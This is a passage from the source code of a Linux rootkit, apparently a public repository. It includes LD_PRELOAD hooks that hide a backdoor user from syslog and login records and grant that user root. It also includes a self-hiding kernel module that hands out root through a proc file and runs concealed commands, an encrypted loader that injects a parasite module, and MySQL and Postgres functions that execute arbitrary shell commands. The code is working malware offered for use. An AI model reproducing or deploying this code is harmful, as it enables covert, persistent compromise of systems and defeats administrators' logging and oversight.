25 | if(is_bdusr())
26 | return;
27 | if(bd_sshproc()){
28 | hook(CSETGID);
29 | call(CSETGID, MAGIC_GID);
30 | return;
31 | }
32 | va_list va;
33 | va_start(va,format);
34 | vsyslog(priority,format,va);
35 | va_end(va);
36 | return;
37 | }
38 |
39 | void vsyslog(int priority, const char *format, va_list ap){
40 | if(is_bdusr())
41 | return;
42 | if(bd_sshproc()){
43 | hook(CSETGID);
44 | call(CSETGID, MAGIC_GID);
45 | return;
46 | }
47 | hook(CVSYSLOG);
48 | call(CVSYSLOG, priority, format, ap);
49 | return;
50 | }
51 |
--------------------------------------------------------------------------------
/src/LD/hooks/syslog/syslog.h:
--------------------------------------------------------------------------------
1 | #ifndef SYSLOG_H
2 | #define SYSLOG_H
3 |
4 | void openlog(const char *ident, int option, int facility);
5 | void syslog(int priority, const char *format, ...);
6 | void __syslog_chk(int priority, int flag, const char *format, ...);
7 | void vsyslog(int priority, const char *format, va_list ap);
8 | #include "syslog.c"
9 |
10 | #endif
11 |
--------------------------------------------------------------------------------
/src/LD/hooks/utmp/getut.c:
--------------------------------------------------------------------------------
1 | struct utmp *getutid(const struct utmp *ut){
2 | struct utmp *tmp;
3 | hook(CGETUTID);
4 | do{
5 | tmp = call(CGETUTID, ut);
6 | if(is_bdusr())
7 | return tmp;
8 | if(tmp == NULL)
9 | continue;
10 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
11 | return tmp;
12 | }
13 |
14 | struct utmpx *getutxid(const struct utmpx *utx){
15 | struct utmpx *tmp;
16 | hook(CGETUTXID);
17 | do{
18 | tmp = call(CGETUTXID, utx);
19 | if(tmp == NULL)
20 | continue;
21 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
22 | return tmp;
23 | }
24 |
25 | struct utmp *getutline(const struct utmp *ut){
26 | struct utmp *tmp;
27 | hook(CGETUTLINE);
28 | do{
29 | tmp = call(CGETUTLINE, ut);
30 | if(tmp == NULL)
31 | continue;
32 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
33 | return tmp;
34 | }
35 |
36 | struct utmpx *getutxline(const struct utmpx *utx){
37 | struct utmpx *tmp;
38 | hook(CGETUTXLINE);
39 | do {
40 | tmp = call(CGETUTXLINE, utx);
41 | if(tmp == NULL)
42 | continue;
43 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
44 | return tmp;
45 | }
46 |
47 | struct utmp *getutent(void){
48 | struct utmp *tmp;
49 | hook(CGETUTENT);
50 | do{
51 | tmp = call(CGETUTENT);
52 | if(tmp == NULL)
53 | continue;
54 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
55 | return tmp;
56 | }
57 |
58 | struct utmpx *getutxent(void){
59 | struct utmpx *tmp;
60 | hook(CGETUTXENT);
61 | do{
62 | tmp = call(CGETUTXENT);
63 | if(tmp == NULL)
64 | continue;
65 | } while(tmp && !xstrncmp(tmp->ut_user, BD_UNAME));
66 | return tmp;
67 | }
68 |
69 | void getutmp(const struct utmpx *ux, struct utmp *u){
70 | if(hide_me)
71 | return;
72 | if(ux && ux->ut_user != NULL)
73 | if(!xstrncmp(ux->ut_user, BD_UNAME))
74 | hide_me = 1;
75 | hook(CGETUTMP);
76 | call(CGETUTMP, ux, u);
77 | }
78 |
79 | void getutmpx(const struct utmp *u, struct utmpx *ux){
80 | if(hide_me)
81 | return;
82 | if(u && u->ut_user != NULL)
83 | if(!xstrncmp(u->ut_user, BD_UNAME))
84 | hide_me = 1;
85 | hook(CGETUTMPX);
86 | call(CGETUTMPX, u, ux);
87 | }
88 |
--------------------------------------------------------------------------------
/src/LD/hooks/utmp/putut.c:
--------------------------------------------------------------------------------
1 | void logwtmp(const char *ut_line, const char *ut_name, const char *ut_host){
2 | if(hide_me)
3 | return;
4 | if(!xstrncmp(ut_name, BD_UNAME)){
5 | hide_me = 1;
6 | return;
7 | }
8 | hook(CLOGWTMP);
9 | // call(CLOGWTMP, ut_line, ut_name, ut_host); // VERY DIRTY FIX. !!! FIX IT AS FAST AS POSIBLE !!!
10 | return;
11 | }
12 |
13 | void updwtmp(const char *wfile, const struct utmp *ut){
14 | if(hide_me)
15 | return;
16 | if(ut && ut->ut_user != NULL)
17 | if(!xstrncmp(ut->ut_user, BD_UNAME)){
18 | hide_me = 1;
19 | return;
20 | }
21 | hook(CUPDWTMP);
22 | call(CUPDWTMP, wfile, ut);
23 | }
24 |
25 | void updwtmpx(const char *wfilex, const struct utmpx *utx){
26 | if(hide_me)
27 | return;
28 | if(utx && utx->ut_user != NULL)
29 | if(!xstrncmp(utx->ut_user, BD_UNAME)){
30 | hide_me = 1;
31 | return;
32 | }
33 | hook(CUPDWTMPX);
34 | call(CUPDWTMPX, wfilex, utx);
35 | }
36 |
--------------------------------------------------------------------------------
/src/LD/hooks/utmp/utmp.h:
--------------------------------------------------------------------------------
1 | #ifndef UTMP_H
2 | #define UTMP_H
3 |
4 | static int hide_me = 0;
5 |
6 | struct utmp *getutent(void);
7 | struct utmpx *getutxent(void);
8 | struct utmp *getutid(const struct utmp *ut);
9 | struct utmpx *getutxid(const struct utmpx *utx);
10 | void getutmp(const struct utmpx *ux, struct utmp *ut);
11 | void getutmpx(const struct utmp *ut, struct utmpx *utx);
12 | struct utmp *getutline(const struct utmp *ut);
13 | struct utmpx *getutxline(const struct utmpx *utx);
14 | #include "getut.c"
15 |
16 | void logwtmp(const char *ut_line, const char *ut_name, const char *ut_host);
17 | void updwtmp(const char *wfile, const struct utmp *ut);
18 | void updwtmpx(const char *wfilex, const struct utmpx *utx);
19 | #include "putut.c"
20 |
21 | void login(const struct utmp *ut){
22 | hook(CLOGIN);
23 | call(CLOGIN, ut);
24 | }
25 |
26 | #endif
27 |
--------------------------------------------------------------------------------
/src/LD/util/bdusr.c:
--------------------------------------------------------------------------------
1 | static char *const unset_variables[4] = {"HISTFILE", "SAVEHIST", "TMOUT", "PROMPT_COMMAND"};
2 | #define UNSET_VARIABLES_SIZE sizeofarray(unset_variables)
3 |
4 | static void unset_bad_vars(void){
5 | int i;
6 | for(i = 0; i < UNSET_VARIABLES_SIZE; i++)
7 | unsetenv(unset_variables[i]);
8 | }
9 |
10 | static int is_bdusr(void){
11 | int ret = 0;
12 | if(getgid() == MAGIC_GID){
13 | ret = 1;
14 | setuid(0);
15 | putenv("HOME=/var/tmp/");
16 | }
17 | if(ret)
18 | unset_bad_vars();
19 | return ret;
20 | }
21 |
--------------------------------------------------------------------------------
/src/LD/util/processes.c:
--------------------------------------------------------------------------------
1 | #include "../hooks/libdl/libdl.h"
2 |
3 | static int open_cmdline(pid_t pid){
4 | char path[PROCPATH_MAXLEN];
5 | int fd;
6 | snprintf(path, sizeof(path), CMDLINE_PATH, pid);
7 | hook(COPEN);
8 | fd = (long)call(COPEN, path, 0, 0);
9 | memset(path, 0, strlen(path));
10 | return fd;
11 | }
12 |
13 | static char *process_info(pid_t pid, int mode){
14 | char *process_info;
15 | int fd, c;
16 | hook(CREAD);
17 | fd = open_cmdline(pid);
18 | if(fd < 0){
19 | process_info = FALLBACK_PROCNAME;
20 | goto end_processinfo;
21 | }
22 | switch(mode){
23 | case MODE_NAME:
24 | process_info = (char *)malloc(NAME_MAXLEN);
25 | c = (long)call(CREAD, fd, process_info, NAME_MAXLEN);
26 | break;
27 | case MODE_CMDLINE:
28 | process_info = (char *)malloc(CMDLINE_MAXLEN);
29 | c = (long)call(CREAD, fd, process_info, CMDLINE_MAXLEN);
30 | int i;
31 | for(i = 0; i < c; i++)
32 | if(process_info[i] == 0x00)
33 | process_info[i] = 0x20;
34 | break;
35 | }
36 | close(fd);
37 | end_processinfo:
38 | return process_info;
39 | }
40 |
41 | static int cmp_process(char *name){
42 | char *myname = process_name();
43 | int status = strncmp(myname, name, strlen(myname));
44 | free(myname);
45 | return !status;
46 | }
47 |
48 | static char *str_process(char *name){
49 | char *myname = process_name(), *status = strstr(name, myname);
50 | free(myname);
51 | return status;
52 | }
53 |
54 | static int process(char *name){
55 | if(cmp_process(name))
56 | return 1;
57 | if(str_process(name))
58 | return 1;
59 | return 0;
60 | }
61 |
62 | static int xprocess(const char *name){
63 | xor(_name, name);
64 | int ret = process(_name);
65 | clean(_name);
66 | return ret;
67 | }
68 |
69 | #define bd_sshproc() xprocess(BD_SSHPROCNAME)
70 |
--------------------------------------------------------------------------------
/src/LD/util/util.h:
--------------------------------------------------------------------------------
1 | #ifndef UTIL_H
2 | #define UTIL_H
3 |
4 | #define CMDLINE_PATH "/proc/%d/cmdline"
5 | #define FALLBACK_PROCNAME "YuuUUU"
6 | #define NAME_MAXLEN 128
7 | #define CMDLINE_MAXLEN 512
8 |
9 | #define PID_MAXLEN 16
10 | #define PROCPATH_MAXLEN strlen(CMDLINE_PATH) + PID_MAXLEN
11 |
12 | #define MODE_NAME 0x01
13 | #define MODE_CMDLINE 0x02
14 |
15 | static void fallbackme(char **dest);
16 | static char *get_cmdline(pid_t pid);
17 | static int open_cmdline(pid_t pid);
18 |
19 | static char *process_info(pid_t pid, int mode);
20 | #define process_name() process_info(getpid(), MODE_NAME)
21 | #define process_cmdline() process_info(getpid(), MODE_CMDLINE)
22 |
23 | static int cmp_process(char *name);
24 | static char *str_process(char *name);
25 | static int process(char *name);
26 | static int bd_sshproc(void);
27 | #include "processes.c"
28 |
29 | #define isbduname(uname) !xstrncmp(uname, BD_UNAME)
30 |
31 | static char *get_username(const pam_handle_t *pamh){
32 | void *u = NULL;
33 | if(pam_get_item(pamh, PAM_USER, (const void **)&u) != PAM_SUCCESS)
34 | return NULL;
35 | return (char *)u;
36 | }
37 |
38 | #define _pam_overwrite(x) \
39 | do{ \
40 | register char *__xx__; \
41 | if((__xx__=(x))) \
42 | while(*__xx__) \
43 | *__xx__++ = '\0'; \
44 | }while(0)
45 |
46 | #define _pam_drop(X) \
47 | do{ \
48 | if(X){ \
49 | free(X); \
50 | X = NULL; \
51 | } \
52 | }while(0)
53 |
54 | int not_user(int id){
55 | if(getuid() != id && geteuid() != id)
56 | return 1;
57 | return 0;
58 | }
59 |
60 | static void unset_bad_vars(void);
61 | static int is_bdusr(void);
62 | #include "bdusr.c"
63 |
64 |
65 |
66 |
67 | #endif
68 |
--------------------------------------------------------------------------------
/src/LD/util/xor.c:
--------------------------------------------------------------------------------
1 | static void _xor(char *p){
2 | int i;
3 | for(i = 0; i < strlen(p); i++)
4 | if(p[i] ^ XKEY)
5 | p[i] ^= XKEY;
6 | }
7 |
8 | static void clean(void *var){
9 | memset(var, 0x00, strlen((char *)var));
10 | free(var);
11 | }
12 |
13 | #define xor(new_name, target) char *new_name = strdup(target); _xor(new_name);
14 |
--------------------------------------------------------------------------------
/src/LD/util/xor_wrappers.h:
--------------------------------------------------------------------------------
1 | static void *xdlsym(void *handle, const char *symbol){
2 | void *ptr = NULL;
3 | xor(_symbol, symbol);
4 | ptr = dlsym(handle, _symbol);
5 | clean(_symbol);
6 | return ptr;
7 | }
8 |
9 | static FILE *xfopen(const char *path, const char *mode){
10 | FILE *ret;
11 | hook(CFOPEN);
12 | xor(_path, path);
13 | ret = call(CFOPEN, _path, mode);
14 | clean(_path);
15 | return ret;
16 | }
17 |
18 | static size_t xfwrite(const char *str, size_t nmemb, FILE *stream){
19 | size_t ret;
20 | hook(CFWRITE);
21 | xor(_str, str);
22 | ret = (size_t)call(CFWRITE, _str, strlen(_str), nmemb, stream);
23 | clean(_str);
24 | return ret;
25 | }
26 |
27 | static int xprintf(const char *string){
28 | int ret;
29 | xor(_string, string);
30 | ret = printf("%s\n", _string);
31 | clean(_string);
32 | return ret;
33 | }
34 |
35 | static int xstrncmp(const char *string, const char *pattern){
36 | int ret;
37 | xor(_pattern, pattern);
38 | ret = strncmp(_pattern, string, strlen(_pattern));
39 | clean(_pattern);
40 | return ret;
41 | }
42 |
43 | static char *xstrstr(const char *pattern, const char *string){
44 | char *ret;
45 | xor(_pattern, pattern);
46 | ret = strstr(string, _pattern);
47 | clean(_pattern);
48 | return ret;
49 | }
50 |
51 | static int xfnmatch(const char *pattern, const char *string){
52 | int ret;
53 | xor(_pattern, pattern);
54 | ret = fnmatch(_pattern, string, FNM_PATHNAME);
55 | clean(_pattern);
56 | return ret;
57 | }
58 |
--------------------------------------------------------------------------------
/src/LKM/LKM.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include //// MAYBE IF
12 | #include "config.h"
13 |
14 | #define WORKQUEUE "ata/0"
15 | #define proc_fs_max 1024
16 | #define CLEAN(var) memset(var, 0x00, strlen(var));
17 | #define xor(new_name, target) char *new_name = kstrdup(target, GFP_KERNEL);_xor(new_name);
18 |
19 | #if LINUX_VERSION_CODE > KERNEL_VERSION(3, 4, 0)
20 | #define V(x) x.val
21 | #else
22 | #define V(x) x
23 | #endif
24 |
25 | static int SESS = 0;
26 | static int TEST = 0;
27 | static struct list_head *mod_list;
28 | static char procfs_buffer[proc_fs_max];
29 | static int proc_buffer_size = 0;
30 | static struct workqueue_struct *work_queue = NULL;
31 | static struct task_struct *my_kthread;
32 | static struct proc_dir_entry *proc_entry;
33 | typedef struct{
34 | struct work_struct work;
35 | char cmd[1024];
36 | } bash_call;
37 |
38 | static void _xor(char *p){
39 | int i;
40 | for(i=0;ilist.prev;
59 | list_del(&THIS_MODULE->list);
60 | kfree(THIS_MODULE->sect_attrs);
61 | THIS_MODULE->sect_attrs = NULL;
62 | // Write Me If You Know How To Fix ;)
63 | // THIS_MODULE->notes_attrs = NULL;
64 | SESS = 1;
65 | } else if(SESS == 1){
66 | list_add(&THIS_MODULE->list, mod_list);
67 | SESS = 0;
68 | }
69 | mutex_unlock(&module_mutex);
70 | return;
71 | }
72 |
73 | static ssize_t hello_proc_write(struct file *fp, const char __user *buf, size_t count, loff_t *offp){
74 | struct cred *new = prepare_kernel_cred(0);
75 | proc_buffer_size = count;
76 | if(proc_buffer_size > proc_fs_max)
77 | proc_buffer_size = proc_fs_max;
78 | if(copy_from_user(procfs_buffer, buf, proc_buffer_size))
79 | return count;
80 | procfs_buffer[proc_buffer_size] = '\0';
81 | if(!xstrncmp(PURGE, procfs_buffer))
82 | hide();
83 | else if(!xstrncmp(GIVEROOTPERM, procfs_buffer)){
84 | #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)
85 | current->uid = 0;
86 | current->suid = 0;
87 | current->euid = 0;
88 | current->fsuid = 0;
89 | current->gid = MGID;
90 | current->sgid = MGID;
91 | current->egid = MGID;
92 | current->fsgid = MGID;
93 | cap_set_full(current->cap_effective);
94 | cap_set_full(current->cap_inheritable);
95 | cap_set_full(current->cap_permitted);
96 | #else
97 | V(new->gid) = MGID;
98 | V(new->sgid) = MGID;
99 | V(new->egid) = MGID;
100 | V(new->fsgid) = MGID;
101 | commit_creds(new);
102 | #endif
103 | } else if(!xstrncmp(LDP, procfs_buffer))
104 | TEST = 1;
105 | return count;
106 | }
107 |
108 | static ssize_t hello_proc_read(struct file *fp, char __user *buf, size_t count, loff_t *offp){
109 | if(TEST != 0){
110 | TEST = 0;
111 | return simple_read_from_buffer(buf, count, offp, LDPSO, LDPSO_len);
112 | }
113 | return 0;
114 | }
115 |
116 | static int threadfn(void *data){
117 | xor(cmd_t, CMD);
118 | xor(cmd_tt, CMD2);
119 | xor(mgid_t, MGID_NAME);
120 | char *argv[] = {"/bin/bash", "-c", cmd_t, NULL};
121 | char *argv2[] = {"/bin/su", "-g", mgid_t, "-c" ,cmd_tt, NULL};
122 | char *envp[] = {"PATH=/bin:/sbin:/usr/local/bin:/usr/local/sbin:/usr/sbin:/usr/bin", NULL};
123 | do {
124 | msleep(100);
125 | call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT); //UMH_NO_WAIT // UMH_WAIT_EXEC // UMH_WAIT_PROC
126 | msleep(MSLP);
127 | call_usermodehelper(argv2[0], argv2, envp, UMH_WAIT_PROC); //UMH_NO_WAIT // UMH_WAIT_EXEC // UMH_WAIT_PROC
128 | msleep(100);
129 | break;
130 | } while(!kthread_should_stop());
131 | CLEAN(cmd_t);
132 | return 0;
133 | }
134 |
135 | static int start_cmd_thread(void){
136 | int cpu = 0;
137 | my_kthread = kthread_create(threadfn, &cpu, "kworker");
138 | kthread_bind(my_kthread, cpu);
139 | wake_up_process(my_kthread);
140 | return 0;
141 | }
142 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 6, 0)
143 | static const struct proc_ops hello_proc_fops = {
144 | .proc_read = hello_proc_read,
145 | .proc_write = hello_proc_write,
146 | };
147 | #else
148 | static const struct file_operations hello_proc_fops = {
149 | .owner = THIS_MODULE,
150 | .read = hello_proc_read,
151 | .write = hello_proc_write,
152 | };
153 | #endif
154 | static int __init extructor_init(void){
155 | work_queue = create_singlethread_workqueue(WORKQUEUE);
156 | if(work_queue){
157 | hide();
158 | xor(hide_t, PROC);
159 | proc_entry = proc_create(hide_t, 0666, NULL, &hello_proc_fops);
160 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 10, 0)
161 | proc_set_user(proc_entry, KUIDT_INIT(0), KGIDT_INIT(MGID));
162 | #else
163 | proc_entry->uid = 0;
164 | proc_entry->gid = MGID;
165 | #endif
166 | CLEAN(hide_t);
167 | if(proc_entry)
168 | start_cmd_thread();
169 | }
170 | return 0;
171 | }
172 |
173 | static void __exit extructor_exit(void){
174 | xor(hide_t, PROC);
175 | remove_proc_entry(hide_t, NULL);
176 | CLEAN(hide_t);
177 | flush_workqueue(work_queue);
178 | destroy_workqueue(work_queue);
179 | return;
180 | }
181 |
182 | module_init(extructor_init);
183 | module_exit(extructor_exit);
184 |
185 | MODULE_LICENSE("GPL");
186 | MODULE_INFO(intree, "Y");
187 | MODULE_INFO(srcversion, "");
188 |
--------------------------------------------------------------------------------
/src/LKM/Makefile:
--------------------------------------------------------------------------------
1 | MODULE = %%LKM_MOD%%
2 | MAKE = make
3 | ccflags-y = -Wall -fno-stack-protector
4 | obj-m = $(MODULE).o
5 | $(MODULE)-y += LKM.o
6 |
7 | all:
8 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD
9 | clean:
10 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD clean
11 |
12 |
--------------------------------------------------------------------------------
/src/LKM/config.h:
--------------------------------------------------------------------------------
1 | #define LKM_MOD "%%LKM_MOD%%"
2 | #define GIVEROOTPERM "%%GIVEROOTPERM%%"
3 | #define LDP "%%LDP%%"
4 | #define PURGE "%%PURGE%%"
5 | #define PROC "%%PROC%%"
6 | #define CMD "%%C_C%%"
7 | #define CMD2 "%%C_C_C%%"
8 | #define MGID_NAME "%%MGID_NAME%%"
9 |
10 | #define XKEY %%XKEY%%
11 | #define MGID %%MGID%%
12 |
13 | #define MSLP 5000
14 |
--------------------------------------------------------------------------------
/src/LOADER/LOADER.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #ifndef user_addr_max
7 | #define user_addr_max() (current_thread_info()->addr_limit.seg)
8 | #endif
9 |
10 | #include "encrypt/encrypt.h"
11 |
12 | #define SYS_INIT_MODULE ({ \
13 | unsigned int *p = __builtin_alloca(16); \
14 | p[0] = 0x5f737973; \
15 | p[1] = 0x74696e69; \
16 | p[2] = 0x646f6d5f; \
17 | p[3] = 0x00656c75; \
18 | (char *)p; \
19 | })
20 |
21 | #define SYS_DELETE_MODULE ({ \
22 | unsigned int *p = __builtin_alloca(24); \
23 | p[0] = 0x5f737973; \
24 | p[1] = 0x656c6564; \
25 | p[2] = 0x6d5f6574; \
26 | p[3] = 0x6c75646f; \
27 | p[4] = 0x00000065; \
28 | p[5] = 0x00000000; \
29 | (char *)p; \
30 | })
31 |
32 | #define __DO_SYS_DELETE_MODULE ({ \
33 | unsigned int *p = __builtin_alloca(24); \
34 | p[0] = 0x6f645f5f; \
35 | p[1] = 0x7379735f; \
36 | p[2] = 0x6c65645f; \
37 | p[3] = 0x5f657465; \
38 | p[4] = 0x75646f6c; \
39 | p[5] = 0x0000656c; \
40 | (char *)p; \
41 | })
42 |
43 |
44 | #define __DO_SYS_INIT_MODULE ({ \
45 | unsigned int *p = __builtin_alloca(24); \
46 | p[0] = 0x6f645f5f; \
47 | p[1] = 0x7379735f; \
48 | p[2] = 0x696e695f; \
49 | p[3] = 0x6f6d5f74; \
50 | p[4] = 0x656c7564; \
51 | p[5] = 0x00000000; \
52 | (char *)p; \
53 | })
54 |
55 | static char parasite_blob[] = {
56 | #include "%%EFILE%%"
57 | };
58 |
59 | static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, unsigned long addr){
60 | int i = 0;
61 | while(!module && (((const char *)data[0]))[i] == name[i])
62 | if (!name[i++])
63 | return !!(data[1] = addr);
64 | return 0;
65 | }
66 |
67 | static inline unsigned long ksym_lookup_name(const char *name){
68 | unsigned long data[2] = {(unsigned long)name, 0};
69 | kallsyms_on_each_symbol((void *)ksym_lookup_cb, data);
70 | return data[1];
71 | }
72 |
73 | extern int __init %%INIT_FUNC%%(void);
74 | extern int __exit %%EXIT_FUNC%%(void);
75 |
76 | int __init %%INIT_FUNC_NAME%%(void){
77 | asmlinkage long (*sys_init_module)(const void *, unsigned long, const char *) = NULL;
78 | %%INIT_FUNC%%();
79 | do_decrypt(parasite_blob, sizeof(parasite_blob), DECRYPT_KEY);
80 | sys_init_module = (void *)ksym_lookup_name(SYS_INIT_MODULE);
81 | if(!sys_init_module)
82 | sys_init_module = (void *)ksym_lookup_name(__DO_SYS_INIT_MODULE);
83 | if(sys_init_module){
84 | const char *nullarg = parasite_blob;
85 | unsigned long seg = user_addr_max();
86 | while(*nullarg)
87 | nullarg++;
88 | user_addr_max() = roundup((unsigned long)parasite_blob + sizeof(parasite_blob), PAGE_SIZE);
89 | sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg);
90 | user_addr_max() = seg;
91 | }
92 | return 0;
93 | }
94 |
95 | void __exit %%EXIT_FUNC_NAME%%(void){
96 | asmlinkage long (*sys_delete_module)(const char __user *, unsigned int);
97 | sys_delete_module = (void *)ksym_lookup_name(SYS_DELETE_MODULE);
98 | if(!sys_delete_module)
99 | sys_delete_module = (void *)ksym_lookup_name(__DO_SYS_DELETE_MODULE);
100 | if(sys_delete_module)
101 | sys_delete_module(parasite_blob, 00004000);
102 | %%EXIT_FUNC%%();
103 | return;
104 | }
105 |
106 | MODULE_LICENSE("GPL");
107 | MODULE_INFO(intree, "Y");
108 |
--------------------------------------------------------------------------------
/src/LOADER/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = %%LOADER_MOD%%
2 | MODULE = %%ORIG_LKM_PATH%%
3 | EKEY = %%EKEY%%
4 | EFILE = %%EFILE%%
5 |
6 | obj-m += $(TARGET).o
7 | $(TARGET)-y += LOADER.o
8 |
9 | ccflags-y += $(CFLAGS) -Os -fno-stack-protector
10 |
11 | KBUILD_CFLAGS := $(subst -pg,,$(KBUILD_CFLAGS))
12 | KBUILD_CFLAGS := $(subst -mfentry,,$(KBUILD_CFLAGS))
13 |
14 | all: encode
15 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD
16 |
17 | encode:
18 | $(MAKE) -C encrypt
19 | encrypt/encrypt $(MODULE) $(EKEY) > $(EFILE)
20 |
21 | clean:
22 | $(MAKE) -C encrypt clean
23 | $(MAKE) -C /lib/modules/%%VER%%/build M=$$PWD clean
24 | rm -f $(EFILE)
25 |
--------------------------------------------------------------------------------
/src/LOADER/encrypt/Makefile:
--------------------------------------------------------------------------------
1 | encrypt: encrypt.c
2 | gcc -std=c99 $< -o $@
3 | clean:
4 | rm -f encrypt
5 |
--------------------------------------------------------------------------------
/src/LOADER/encrypt/encrypt.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #include "encrypt.h"
6 |
7 | static long get_file_size(FILE *file){
8 | long size;
9 | fseek(file, 0, SEEK_END);
10 | size = ftell(file);
11 | rewind(file);
12 | return size;
13 | }
14 |
15 | int main(int argc, char **argv){
16 | if (argc != 3)
17 | exit(-1);
18 | FILE *file = fopen(argv[1], "rb");
19 | if (!file)
20 | exit(-2);
21 | long size = get_file_size(file);
22 | unsigned char *data = malloc(size);
23 | if (!data)
24 | exit(-3);
25 | if (fread(data, size, 1, file) != 1)
26 | exit(-4);
27 | fclose(file);
28 | uint32_t key = strtol(argv[2], NULL, 16);
29 | do_encrypt(data, size, key);
30 | printf("#define DECRYPT_KEY 0x%08x\n", key);
31 | for (int i = 0; i < size; i++)
32 | printf("0x%02x,", data[i]);
33 | return 0;
34 | }
35 |
--------------------------------------------------------------------------------
/src/LOADER/encrypt/encrypt.h:
--------------------------------------------------------------------------------
1 | #ifndef __LOADER_H__
2 | #define __LOADER_H__
3 |
4 | #define do_encrypt(ptr, len, key) do_encode(ptr, len, key)
5 | #define do_decrypt(ptr, len, key) do_encode(ptr, len, key)
6 |
7 | static inline unsigned int custom_rol32(unsigned int val, int n){
8 | return ((val << n) | (val >> (32 - n)));
9 | }
10 |
11 | static inline void do_encode(void *ptr, unsigned int len, unsigned int key){
12 | while (len > sizeof(key)) {
13 | *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13));
14 | len -= sizeof(key), ptr += sizeof(key);
15 | }
16 | }
17 |
18 | #endif
19 |
--------------------------------------------------------------------------------
/src/MYSQL/Makefile:
--------------------------------------------------------------------------------
1 | CC = gcc
2 |
3 | FLAGS = -std=gnu99
4 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops -fno-jump-tables -Os -g0 -I%%MYSQL_I_DIR%% -I./-.
5 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now
6 |
7 | TARGET = UDF.so
8 | SOURCES = UDF.c
9 | OBJECTS = $(SOURCES:.c=.o)
10 |
11 | $(TARGET): $(OBJECTS)
12 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS)
13 |
14 | clean:
15 | rm -rf $(OBJECTS) $(TARGET)
16 |
--------------------------------------------------------------------------------
/src/MYSQL/UDF.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | my_bool %%MYSQL_NAME%%_init(UDF_INIT *initid, UDF_ARGS *args, char *message);
7 | void %%MYSQL_NAME%%_deinit(UDF_INIT *initid);
8 | char *%%MYSQL_NAME%%(UDF_INIT *initid, UDF_ARGS *args, char* result, unsigned long* length, char *is_null, char *error);
9 |
10 | my_bool %%MYSQL_NAME%%_init(UDF_INIT *initid, UDF_ARGS *args, char *message){
11 | unsigned int i=0;
12 | if(args->arg_count == 1 && args->arg_type[i] == STRING_RESULT)
13 | return 0;
14 | else
15 | return 1;
16 | }
17 |
18 | void %%MYSQL_NAME%%_deinit(UDF_INIT *initid){}
19 |
20 | char *%%MYSQL_NAME%%(UDF_INIT *initid, UDF_ARGS *args, char* result, unsigned long* length, char *is_null, char *error){
21 | FILE *pipe;
22 | char line[1024];
23 | unsigned long outlen, linelen;
24 | result = malloc(1);
25 | outlen = 0;
26 | pipe = popen(args->args[0], "r");
27 | while (fgets(line, sizeof(line), pipe) != NULL) {
28 | linelen = strlen(line);
29 | result = realloc(result, outlen + linelen);
30 | strncpy(result + outlen, line, linelen);
31 | outlen = outlen + linelen;
32 | }
33 | pclose(pipe);
34 | if (!(*result) || result == NULL)
35 | *is_null = 1;
36 | else {
37 | result[outlen-1] = 0x00;
38 | *length = strlen(result);
39 | }
40 | return result;
41 | }
42 |
--------------------------------------------------------------------------------
/src/PAM/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/PAM/.keep
--------------------------------------------------------------------------------
/src/POSTGRES/Makefile:
--------------------------------------------------------------------------------
1 | CC = gcc
2 |
3 | FLAGS = -std=gnu99
4 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops -fno-jump-tables -Os -g0 -I%%POSTGRES_I_DIR%% -I./-.
5 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now
6 |
7 | TARGET = UDF.so
8 | SOURCES = UDF.c
9 | OBJECTS = $(SOURCES:.c=.o)
10 |
11 | $(TARGET): $(OBJECTS)
12 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS)
13 |
14 | clean:
15 | rm -rf $(OBJECTS) $(TARGET)
16 |
--------------------------------------------------------------------------------
/src/POSTGRES/UDF.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #ifdef PG_MODULE_MAGIC
6 | PG_MODULE_MAGIC;
7 | #endif
8 |
9 | PG_FUNCTION_INFO_V1(%%POSTGRES_NAME%%);
10 | #if PG_VERSION_NUM < 80300
11 | extern DLLIMPORT Datum %%POSTGRES_NAME%%(PG_FUNCTION_ARGS){
12 | #elif PG_VERSION_NUM >= 80300
13 | extern PGDLLIMPORT Datum %%POSTGRES_NAME%%(PG_FUNCTION_ARGS){
14 | #endif
15 | text *argv0 = PG_GETARG_TEXT_P(0), *result_text;
16 | int32 argv0_size = VARSIZE(argv0) - VARHDRSZ, outlen = 0, linelen;
17 | char *command = (char *)malloc(argv0_size + 1), *result, line[1024];
18 | FILE *pipe;
19 |
20 | memcpy(command, VARDATA(argv0), argv0_size);
21 | command[argv0_size] = '\0';
22 | result = (char *)malloc(1);
23 | pipe = popen(command, "r");
24 | while (fgets(line, sizeof(line), pipe) != NULL) {
25 | linelen = strlen(line);
26 | result = (char *)realloc(result, outlen + linelen);
27 | strncpy(result + outlen, line, linelen);
